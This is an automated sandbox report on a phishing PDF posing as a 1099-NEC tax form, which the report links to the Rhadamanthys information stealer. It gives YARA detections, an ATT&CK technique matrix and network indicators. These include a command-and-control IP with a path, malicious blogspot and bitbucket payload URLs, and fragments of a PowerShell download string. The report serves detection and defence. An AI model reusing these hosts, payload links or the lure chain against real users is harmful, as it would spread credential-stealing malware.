Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 19_2_058854D6 NtQuerySystemInformation,malloc,NtQuerySystemInformation,GetCurrentProcess,GetCurrentProcess,memset,RtlGetVersion,GetCurrentProcess,OpenProcess,CloseHandle,lstrcmpiW,OpenProcess,CloseHandle,free,

19_2_058854D6

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: fontdrvhost.exe, 00000021.00000002.1899301362.0000000003040000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: autoruns.exe

Stealing of Sensitive Information

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000013.00000002.1799759215.0000000005590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1790017213.0000000005520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1778830242.0000000003323000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1801955151.0000000005883000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1778830242.0000000003183000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1790344128.00000000056E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1776870135.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1778389744.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000013.00000002.1799759215.0000000005590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1790017213.0000000005520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1778830242.0000000003323000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1801955151.0000000005883000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1778830242.0000000003183000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1790344128.00000000056E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1776870135.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1778389744.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	12 Scripting	Valid Accounts	31 Windows Management Instrumentation	12 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	21 Input Capture	3 File and Directory Discovery	Remote Services	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	31 Native API	1 DLL Side-Loading	211 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	235 System Information Discovery	Remote Desktop Protocol	21 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	1 Browser Extensions	31 Registry Run Keys / Startup Folder	3 Obfuscated Files or Information	Security Account Manager	671 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Command and Scripting Interpreter	31 Registry Run Keys / Startup Folder	Login Hook	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	281 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	281 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	211 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1099-NEC.pdf	2%	Virustotal		Browse
1099-NEC.pdf	13%	ReversingLabs	Document-PDF.Phishing.Generic

Source	Detection	Scanner	Label
https://www.securefilepro.com/assets/css/styles.css?v=1.0	0%	Avira URL Cloud	safe
https://marchlkalanew6.blog	0%	Avira URL Cloud	safe
https://d12bxbf7nz45kt.cloudfront.net/images/DrakePortals-logo.png	0%	Avira URL Cloud	safe
http://alertifyjs.com)	0%	Avira URL Cloud	safe
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-SleepzR	0%	Avira URL Cloud	safe
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;jM	0%	Avira URL Cloud	safe
https://marchlkalanew6.blogspot.com/lundchikha.doc	0%	Avira URL Cloud	safe
http://stuartk.com/jszip	0%	Avira URL Cloud	safe
https://marchlkalanew6.blogspot.com/atom.xml	0%	Avira URL Cloud	safe
https://www.securefilepro.com/	0%	Avira URL Cloud	safe
https://d12bxbf7nz45kt.cloudfront.net/images/landing/relax.svg	0%	Avira URL Cloud	safe
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;mM	0%	Avira URL Cloud	safe
https://www.tax1099.com/img/favicon.png	0%	Avira URL Cloud	safe
https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15p	0%	Avira URL Cloud	safe
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;Y	0%	Avira URL Cloud	safe
https://www.securefilepro.com/_Incapsula_Resource?SWKMTFSR=1&e=0.9864439118759336	0%	Avira URL Cloud	safe
https://d12bxbf7nz45kt.cloudfront.net/images/landing/send.svg	0%	Avira URL Cloud	safe
https://kalacpamarchclean.blogspot.com/chig.doc)	0%	Avira URL Cloud	safe
https://www.securefilepro.com/portal/polyfills.4aee66a14cad3606.js	0%	Avira URL Cloud	safe
https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15pkernelbasentdllkernel32GetProcessMitigatio	0%	Avira URL Cloud	safe
https://www.securefilepro.com/portal/main.690005fd134686e7.js	0%	Avira URL Cloud	safe
https://tax1099.netlify.app/	0%	Avira URL Cloud	safe
https://marchlkalanew6.blogspot.com	0%	Avira URL Cloud	safe
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Slee	0%	Avira URL Cloud	safe
https://d12bxbf7nz45kt.cloudfront.net/images/landing/anytime.svg	0%	Avira URL Cloud	safe
https://www.securefilepro.com/favicon.ico	0%	Avira URL Cloud	safe
https://.Exte1	0%	Avira URL Cloud	safe
https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15px	0%	Avira URL Cloud	safe
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;	0%	Avira URL Cloud	safe
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;?M	0%	Avira URL Cloud	safe
https://www.securefilepro.com/portal/styles.cc0a641a0c9da1ad.css	0%	Avira URL Cloud	safe
http://alertifyjs.com	0%	Avira URL Cloud	safe
https://d12bxbf7nz45kt.cloudfront.net/images/landing/get.svg	0%	Avira URL Cloud	safe
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep	0%	Avira URL Cloud	safe
https://www.securefilepro.com/_Incapsula_Resource?SWJIYLWA=719d34d31c8e3a6e6fffd425f7e032f3&ns=1&cb=661820476	0%	Avira URL Cloud	safe
https://www.securefilepro.com/portal/runtime.5be9c3325b3311c4.js	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
jsdelivr.map.fastly.net	151.101.1.229	true	false	high
www.tax1099.com	104.18.31.249	true	false	high
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
bitbucket.org	185.166.143.48	true	false	high
e8652.dscx.akamaiedge.net	23.209.213.129	true	false	high
cdnjs.cloudflare.com	104.17.24.14	true	false	high
blogspot.l.googleusercontent.com	142.250.185.225	true	false	high
pgl344p.ng.impervadns.net	45.223.19.158	true	false	unknown
www.google.com	172.217.16.196	true	false	high
netlify.app	3.125.36.175	true	true	unknown
tax1099.netlify.app	3.125.36.175	true	true	unknown
d12bxbf7nz45kt.cloudfront.net	18.245.46.7	true	false	high
x1.i.lencr.org	unknown	unknown	false	high
cdn.jsdelivr.net	unknown	unknown	false	high
marchlkalanew6.blogspot.com	unknown	unknown	true	unknown
www.securefilepro.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://tax1099.netlify.app/#1099-NEC.pdf	true		unknown
https://www.securefilepro.com/assets/css/styles.css?v=1.0	false	Avira URL Cloud: safe	unknown
https://cdn.jsdelivr.net/npm/alertifyjs@1.13.1/build/alertify.min.js	false		high
https://marchlkalanew6.blogspot.com/lundchikha.doc	false	Avira URL Cloud: safe	unknown
https://www.securefilepro.com/	false	Avira URL Cloud: safe	unknown
https://marchlkalanew6.blogspot.com/atom.xml	false	Avira URL Cloud: safe	unknown
https://d12bxbf7nz45kt.cloudfront.net/images/DrakePortals-logo.png	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js	false		high
https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15p	true	Avira URL Cloud: safe	unknown
https://d12bxbf7nz45kt.cloudfront.net/images/landing/relax.svg	false	Avira URL Cloud: safe	unknown
https://cdn.jsdelivr.net/npm/javascript-obfuscator/dist/index.browser.js	false		high
https://www.securefilepro.com/_Incapsula_Resource?SWKMTFSR=1&e=0.9864439118759336	false	Avira URL Cloud: safe	unknown
https://www.tax1099.com/img/favicon.png	false	Avira URL Cloud: safe	unknown
https://d12bxbf7nz45kt.cloudfront.net/images/landing/send.svg	false	Avira URL Cloud: safe	unknown
https://www.securefilepro.com/assets/sfp.html	false		unknown
https://bitbucket.org/!api/2.0/snippets/ansidjaassdasmjkkkkk/Ed7Axy/674fe1eb1b772d5a8f6b913ad0a40c3c7a1d2410/files/file	false		high
https://www.securefilepro.com/portal/polyfills.4aee66a14cad3606.js	false	Avira URL Cloud: safe	unknown
https://www.securefilepro.com/portal/main.690005fd134686e7.js	false	Avira URL Cloud: safe	unknown
https://tax1099.netlify.app/	true	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js	false		high
https://d12bxbf7nz45kt.cloudfront.net/images/landing/anytime.svg	false	Avira URL Cloud: safe	unknown
https://www.securefilepro.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://www.securefilepro.com/portal/styles.cc0a641a0c9da1ad.css	false	Avira URL Cloud: safe	unknown
https://cdn.jsdelivr.net/npm/alertifyjs@1.13.1/build/css/alertify.min.css	false		high
https://d12bxbf7nz45kt.cloudfront.net/images/landing/get.svg	false	Avira URL Cloud: safe	unknown
https://www.securefilepro.com/portal/runtime.5be9c3325b3311c4.js	false	Avira URL Cloud: safe	unknown
https://www.securefilepro.com/_Incapsula_Resource?SWJIYLWA=719d34d31c8e3a6e6fffd425f7e032f3&ns=1&cb=661820476	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://raw.github.com/Stuk/jszip/main/LICENSE.markdown.	chromecache_231.13.dr	false		high
https://github.com/nodeca/pako/blob/main/LICENSE	chromecache_231.13.dr	false		high
http://ocsp.sectigo.com0	wscript.exe, 00000010.00000003.1514314397.000001348F401000.00000004.00000020.00020000.00000000.sdmp	false		high
https://marchlkalanew6.blog	wscript.exe, 00000010.00000002.1604297870.000001348F660000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 00000011.00000002.2532186545.0000023AD0562000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000011.00000002.2036949117.0000023AC807A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sketch.com	chromecache_226.13.dr, chromecache_224.13.dr, chromecache_227.13.dr, chromecache_229.13.dr, chromecache_221.13.dr, chromecache_236.13.dr	false		high
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-SleepzR	powershell.exe, 00000011.00000002.2018360550.0000023AB6148000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://stuartk.com/jszip	chromecache_231.13.dr	false	Avira URL Cloud: safe	unknown
http://alertifyjs.com)	chromecache_225.13.dr	false	Avira URL Cloud: safe	unknown
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;jM	powershell.exe, 00000011.00000002.2018360550.0000023AB6148000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000011.00000002.2036949117.0000023AC807A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000011.00000002.2036949117.0000023AC807A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://opensource.org/licenses/MIT).	chromecache_235.13.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000011.00000002.2021948691.0000023AB8001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org	powershell.exe, 00000011.00000002.2021948691.0000023AB83DF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org/	powershell.exe, 00000011.00000002.2021948691.0000023AB83B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2021948691.0000023AB83A6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000011.00000002.2036949117.0000023AC807A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/	2D85F72862B55C4EADD9E66E06947F3D0.1.dr	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000011.00000002.2021948691.0000023AB83F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	wscript.exe, 00000010.00000003.1514314397.000001348F401000.00000004.00000020.00020000.00000000.sdmp	false		high
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;mM	powershell.exe, 00000011.00000002.2018360550.0000023AB6140000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000011.00000002.2021948691.0000023AB8227000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000011.00000002.2021948691.0000023AB83F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000011.00000002.2021948691.0000023AB8227000.00000004.00000800.00020000.00000000.sdmp	false		high
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;Y	powershell.exe, 00000011.00000002.2020294307.0000023AB6370000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kalacpamarchclean.blogspot.com/chig.doc)	powershell.exe, 00000011.00000002.2020294307.0000023AB6374000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2018360550.0000023AB6183000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000011.00000002.2036949117.0000023AC807A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	wscript.exe, 00000010.00000003.1514314397.000001348F401000.00000004.00000020.00020000.00000000.sdmp	false		high
https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15pkernelbasentdllkernel32GetProcessMitigatio	fontdrvhost.exe, 00000021.00000002.1899968961.0000000005144000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000025.00000002.1942571963.0000025AD4150000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloudflare-dns.com/dns-query	fontdrvhost.exe, 00000021.00000003.1857376404.0000000004B89000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi	fontdrvhost.exe, 00000021.00000003.1857376404.0000000004B89000.00000004.00000020.00020000.00000000.sdmp	false		high
https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15px	fontdrvhost.exe, 00000020.00000002.1776041210.0000000002EDD000.00000004.00000010.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000002.1889395265.00000000004EC000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://opensource.org/licenses/gpl-3.0	chromecache_225.13.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000011.00000002.2021948691.0000023AB8227000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	wscript.exe, 00000010.00000003.1514314397.000001348F401000.00000004.00000020.00020000.00000000.sdmp	false		high
https://.Exte1	powershell.exe, 00000011.00000002.2532186545.0000023AD048D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Slee	wscript.exe, 00000010.00000003.1601351766.000001348D729000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000011.00000002.2021948691.0000023AB83F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;	powershell.exe, 00000011.00000002.2020927094.0000023AB7BA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://marchlkalanew6.blogspot.com	powershell.exe, 00000011.00000002.2021948691.0000023AB8227000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;?M	powershell.exe, 00000011.00000002.2527101862.0000023AD0156000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000011.00000002.2021948691.0000023AB8001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://alertifyjs.com	chromecache_225.13.dr	false	Avira URL Cloud: safe	unknown
https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep	powershell.exe, 00000011.00000002.2018360550.0000023AB6148000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.18.31.249	www.tax1099.com	United States	13335	CLOUDFLARENETUS	false
151.101.129.229	unknown	United States	54113	FASTLYUS	false
23.209.213.129	e8652.dscx.akamaiedge.net	United States	23693	TELKOMSEL-ASN-IDPTTelekomunikasiSelularID	false
142.250.185.225	blogspot.l.googleusercontent.com	United States	15169	GOOGLEUS	false
185.208.159.170	unknown	Switzerland	34888	SIMPLECARRER2IT	true
18.245.46.46	unknown	United States	16509	AMAZON-02US	false
151.101.1.229	jsdelivr.map.fastly.net	United States	54113	FASTLYUS	false
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
3.125.36.175	netlify.app	United States	16509	AMAZON-02US	true
45.223.19.158	pgl344p.ng.impervadns.net	United States	19551	INCAPSULAUS	false
185.166.143.48	bitbucket.org	Germany	16509	AMAZON-02US	false
172.217.16.196	www.google.com	United States	15169	GOOGLEUS	false
104.17.25.14	unknown	United States	13335	CLOUDFLARENETUS	false
18.245.46.7	d12bxbf7nz45kt.cloudfront.net	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.16
192.168.2.7

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1640809
Start date and time:	2025-03-17 18:51:44 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1099-NEC.pdf
Detection:	MAL
Classification:	mal100.troj.expl.evad.winPDF@72/124@29/16
EGA Information:	Successful, ratio: 88.9%
HCA Information:	Successful, ratio: 83% Number of executed functions: 152 Number of non-executed functions: 53
Cookbook Comments:	Found application associated with file extension: .pdf

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.19.104.203, 3.233.129.217, 52.6.155.20, 52.22.41.97, 3.219.243.226, 4.245.163.56, 172.64.41.3, 162.159.61.3, 20.3.187.198, 199.232.214.172, 2.22.242.11, 2.22.242.123, 23.60.203.209, 13.95.31.18, 142.250.181.238, 142.250.186.67, 142.250.185.206, 74.125.206.84, 142.250.186.142, 216.58.206.78, 142.250.74.195, 142.250.185.138, 142.250.186.46, 172.217.16.206, 172.217.16.142, 40.71.93.126, 172.217.18.99, 142.250.185.238, 34.104.35.123, 142.250.185.131, 13.92.180.205, 142.250.185.142, 172.217.23.110, 216.58.206.46, 172.217.18.110, 40.69.146.102, 23.217.172.185, 40.126.31.130
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, acroipm2.adobe.com, onedsblobvmssprdeus02.eastus.cloudapp.azure.com, clients2.google.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, login.live.com, a122.dscd.akamai.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, fonts.gstatic.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, onedsblobvmssprdeus04.eastus.cloudapp.azure.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com,
Execution Graph export aborted for target fontdrvhost.exe, PID 7668 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
13:52:29	API Interceptor	2x Sleep call for process: AcroCEF.exe modified
13:53:04	API Interceptor	13486x Sleep call for process: powershell.exe modified
13:53:29	API Interceptor	4x Sleep call for process: dw20.exe modified
13:53:44	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.208.159.170	https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf	Get hash	malicious	RHADAMANTHYS	Browse
185.208.159.170	cpainject.txt.ps1	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse
151.101.129.229	http://valleyprohealth.org	Get hash	malicious	Unknown	Browse	cdn.jsdelivr.net/jquery.slick/1.5.1/slick-theme.css
23.209.213.129	resume.pdf	Get hash	malicious	Unknown	Browse	x1.i.lencr.org/
	attach.pdf	Get hash	malicious	Unknown	Browse	x1.i.lencr.org/
	cndx.com.eml	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	x1.i.lencr.org/
	cv(german-v).pdf	Get hash	malicious	Unknown	Browse	x1.i.lencr.org/
	0015648458_ConfirmationLetter.pdf	Get hash	malicious	Unknown	Browse	x1.i.lencr.org/
	1337.pdf	Get hash	malicious	Unknown	Browse	x1.i.lencr.org/
	Factuur.pdf	Get hash	malicious	Unknown	Browse	x1.i.lencr.org/
	https://get.massive.io/01JN12PB20H9XCNJVKSZRG7SN7?secret=QYVIesQUauQpWOAx	Get hash	malicious	Unknown	Browse	x1.i.lencr.org/
	Ebizcharge-BonusSupport-request-approved.pdf	Get hash	malicious	Unknown	Browse	x1.i.lencr.org/
	Invisalert Solutions Revised Billing Proposal for 2025.pdf	Get hash	malicious	Unknown	Browse	x1.i.lencr.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
e8652.dscx.akamaiedge.net	resume.pdf	Get hash	malicious	Unknown	Browse	23.209.213.129
	f64da42c-e9a8-a0ac-437d-d14377da4643.eml	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	23.209.213.129
	attach.pdf	Get hash	malicious	Unknown	Browse	23.209.213.129
	nZsqQiT9Wr.lnk	Get hash	malicious	Unknown	Browse	2.19.105.127
	Elm City Communities-encrypted.pdf	Get hash	malicious	HTMLPhisher	Browse	2.19.105.127
	7ZSfxMod_x86.exe	Get hash	malicious	Gamaredon, UltraVNC	Browse	2.19.105.127
	Dsyhre- approved on Wednesday March 2025.pdf	Get hash	malicious	Gabagool	Browse	72.246.169.163
	file_1741726008685.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	MyProfessionalResume_Updated.exe	Get hash	malicious	Unknown	Browse	23.209.209.135
jsdelivr.map.fastly.net	VM(Carmen)52177372.mp4.html	Get hash	malicious	HTMLPhisher	Browse	151.101.129.229
	https://forms.office.com/e/CzYzGKsuJ0h0Qz9CdMLPYe0NavsKbyZ12uW0kP6	Get hash	malicious	HTMLPhisher	Browse	151.101.129.229
	https://storage.googleapis.com/dfh7d89fh7df4j65djf4g65j4s6fg7j/031.html#LAst01.html?syb=1x167d493f46630a_vl_b2d.ja6t63xhxq8-0bmkl2j.54qf18g.BOwWGLPM3hoeHE4LTBibWtsMmo0u6Nvi	Get hash	malicious	Phisher	Browse	151.101.193.229
	https://docs.faxcloudstorage.de/uTN1Q	Get hash	malicious	HTMLPhisher	Browse	151.101.1.229
	https://docs.faxcloudstorage.de/uTN1Q	Get hash	malicious	HTMLPhisher	Browse	151.101.1.229
	http://andreaniusa.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	151.101.1.229
	https://sreqmcoommnunlty.com/bysre/tytik/pols	Get hash	malicious	Unknown	Browse	151.101.129.229
	http://case-id-1000228256743.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	151.101.65.229
	http://case-id-1000228254028.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	151.101.1.229
	http://case-id-1000228256475.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	151.101.1.229
bitbucket.org	SecuriteInfo.com.Trojan.Win64.Agent.30981.30321.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	SecuriteInfo.com.Win32.PWSX-gen.25337.28224.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	SecuriteInfo.com.Win32.RATX-gen.20425.5895.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	SecuriteInfo.com.Win32.PWSX-gen.10149.19935.exe	Get hash	malicious	Poverty Stealer	Browse	185.166.143.49
	SecuriteInfo.com.Trojan.Win64.Agent.30981.30321.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	SecuriteInfo.com.Win32.RATX-gen.28955.11907.exe	Get hash	malicious	XWorm	Browse	185.166.143.48
